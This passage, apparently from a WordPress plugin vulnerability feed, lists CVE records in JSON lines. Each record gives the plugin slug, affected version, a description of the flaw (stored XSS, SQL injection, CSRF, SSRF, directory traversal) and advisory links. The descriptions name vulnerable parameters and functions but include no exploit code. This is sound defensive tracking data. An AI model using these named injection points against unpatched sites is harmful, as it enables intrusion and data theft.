CVE-2025-31835.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/DLXPlugins\\\/wp-plugin-info-card\\\/blob\\\/dev\\\/php\\\/Shortcodes.php#L893\",\"name\":\"https:\\\/\\\/github.com\\\/DLXPlugins\\\/wp-plugin-info-card\\\/blob\\\/dev\\\/php\\\/Shortcodes.php#L893\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-plugin-info-card\\\/trunk\\\/php\\\/Shortcodes.php#L929\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-plugin-info-card\\\/trunk\\\/php\\\/Shortcodes.php#L929\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303791\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303791\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-plugin-info-card\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-plugin-info-card\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e29ea7dd-14b8-45d3-a87e-3f58de88af4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e29ea7dd-14b8-45d3-a87e-3f58de88af4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6690","slug":"wp-tournament-registration","versionImpact":"1.3.0","description":"The WP Tournament Registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018field\u2019 parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tournament-registration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tournament-registration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf3c6dd5-498e-4aff-90fb-15ede66f5e3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf3c6dd5-498e-4aff-90fb-15ede66f5e3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4445","slug":"fl3r-feelbox","versionImpact":"8.1","description":"The FL3R FeelBox WordPress plugin through 8.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bb6fde0-1347-496b-be03-3512e6b7e8f8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bb6fde0-1347-496b-be03-3512e6b7e8f8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1924","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_toolbar_save_settings_callback function. This makes it possible for unauthenticated attackers to change cache settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87f610a-c1ef-4365-bd74-569989587d41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87f610a-c1ef-4365-bd74-569989587d41?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2634","slug":"get-your-number","versionImpact":"1.1.3","description":"The Get your number WordPress plugin through 1.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df111aa-6057-47a2-8e8b-9ef5ec3bb472\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df111aa-6057-47a2-8e8b-9ef5ec3bb472\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5615","slug":"skype-online-status","versionImpact":"3.1","description":"The Skype Legacy Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skype-status' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/914bcc8f-fecd-450e-b2a7-0989b7a0dd4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/914bcc8f-fecd-450e-b2a7-0989b7a0dd4c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skype-online-status\\\/tags\\\/3.1\\\/skype-classes.php#L316\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skype-online-status\\\/tags\\\/3.1\\\/skype-classes.php#L316\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5708","slug":"wp-post-columns","versionImpact":"2.2","description":"The WP Post Columns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'column' shortcode in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d96e5986-8c89-4e7e-aa63-f41aa13eeff4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d96e5986-8c89-4e7e-aa63-f41aa13eeff4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-columns\\\/trunk\\\/wp_post_columns.php?rev=112013#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-columns\\\/trunk\\\/wp_post_columns.php?rev=112013#L59\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1711","slug":"mediavine-create","versionImpact":"1.9.4","description":"The Create by Mediavine plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.9.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9072","slug":"gdpr-consent-manager","versionImpact":"1.0.0","description":"The GDPR-Extensions-com \u2013 Consent Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ce2a9fe-3364-46b5-a6ae-b4feb3e20647?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ce2a9fe-3364-46b5-a6ae-b4feb3e20647?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gdpr-consent-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gdpr-consent-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9772","slug":"uix-shortcodes","versionImpact":"1.9.9","description":"The Uix Shortcodes \u2013 Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3000758d-68e0-46a6-aef0-e2407a828168?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3000758d-68e0-46a6-aef0-e2407a828168?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-shortcodes\\\/trunk\\\/shortcodes\\\/templates\\\/default\\\/frontpage-init.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-shortcodes\\\/trunk\\\/shortcodes\\\/templates\\\/default\\\/frontpage-init.php#L9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10178","slug":"gutentor","versionImpact":"3.3.9","description":"The Gutentor \u2013 Gutenberg Blocks \u2013 Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199233%40gutentor%2Ftrunk&old=3179242%40gutentor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199233%40gutentor%2Ftrunk&old=3179242%40gutentor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutentor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutentor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ecebfd-b07f-415f-892f-e069ab84031a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ecebfd-b07f-415f-892f-e069ab84031a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12557","slug":"transportersio","versionImpact":"2.0.84","description":"The Transporters.io plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.84. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/transportersio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/transportersio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f79778c-c11a-4d98-bc26-8113c3fef630?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f79778c-c11a-4d98-bc26-8113c3fef630?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22704","slug":"wordpress-signature","versionImpact":"0.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Abinav Thakuri WordPress Signature allows Cross Site Request Forgery. This issue affects WordPress Signature: from n\/a through 0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-signature\\\/vulnerability\\\/wordpress-wordpress-signature-plugin-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-signature\\\/vulnerability\\\/wordpress-wordpress-signature-plugin-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11753","slug":"umich-oidc-login","versionImpact":"1.2.0","description":"The UMich OIDC Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'umich_oidc_button' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/class-run.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/class-run.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b372ad3a-0056-45fb-9a0e-7604f4fdf240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b372ad3a-0056-45fb-9a0e-7604f4fdf240?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13781","slug":"hmapsprem","versionImpact":"2.3.9","description":"The Hero Maps Premium plugin for WordPress is vulnerable to SQL Injection via several AJAX actions in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-maps-premium-responsive-google-maps-plugin\\\/12577151\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-maps-premium-responsive-google-maps-plugin\\\/12577151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f394209-df80-491f-b700-cc06e54ea676?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f394209-df80-491f-b700-cc06e54ea676?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1912","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the validate_file() Function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406b52dc-3d36-4b03-a932-34f456395979?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406b52dc-3d36-4b03-a932-34f456395979?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3300","slug":"wpmastertoolkit","versionImpact":"2.5.2","description":"The WPMasterToolKit (WPMTK) \u2013 All in one plugin plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to read and modify the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpmastertoolkit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpmastertoolkit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c389ba1a-45c5-4fba-9b99-0713fe39da42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c389ba1a-45c5-4fba-9b99-0713fe39da42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5103","slug":"woo-gift-cards-lite","versionImpact":"3.1.4","description":"The Ultimate Gift Cards for WooCommerce plugin for WordPress is vulnerable to boolean-based SQL Injection via the 'default_price' and 'product_id' parameters in all versions up to, and including, 3.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/3.1.4\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php#L571\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/3.1.4\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php#L571\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303359\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303359\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-gift-cards-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-gift-cards-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e89383-a9c6-4300-970c-0b36e4d97e3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e89383-a9c6-4300-970c-0b36e4d97e3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6259","slug":"esri-map-view","versionImpact":"1.2.3","description":"The esri-map-view plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's esri-map-view shortcode in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/esri-map-view\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/esri-map-view\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67001e61-c7f5-46bc-9d32-b121ce5d6fd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67001e61-c7f5-46bc-9d32-b121ce5d6fd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1923","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_remove_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ba5cfa-c2cc-49ac-b22d-7e36ccca6ac5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ba5cfa-c2cc-49ac-b22d-7e36ccca6ac5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0761","slug":"wp-file-manager","versionImpact":"7.2.1","description":"The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers, to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023403\\\/wp-file-manager\\\/trunk\\\/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023403\\\/wp-file-manager\\\/trunk\\\/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1477","slug":"easy-maintenance-mode-coming-soon","versionImpact":"1.4.2","description":"The Easy Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.2 via the REST API. This makes it possible for authenticated attackers to obtain post and page content via REST API thus bypassing the protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-maintenance-mode-coming-soon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-maintenance-mode-coming-soon\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6363","slug":"stock-ticker","versionImpact":"3.24.4","description":"The Stock Ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's stock_ticker shortcode in all versions up to, and including, 3.24.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280a5d6d-192a-43aa-927e-45c50b126463?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280a5d6d-192a-43aa-927e-45c50b126463?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stock-ticker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stock-ticker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stock-ticker\\\/trunk\\\/stock-ticker.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stock-ticker\\\/trunk\\\/stock-ticker.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9066","slug":"marketing-and-seo-booster","versionImpact":"1.9.10","description":"The Marketing and SEO Booster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52144ff6-0617-496c-8159-ec5d7bc86f60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52144ff6-0617-496c-8159-ec5d7bc86f60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketing-and-seo-booster\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketing-and-seo-booster\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
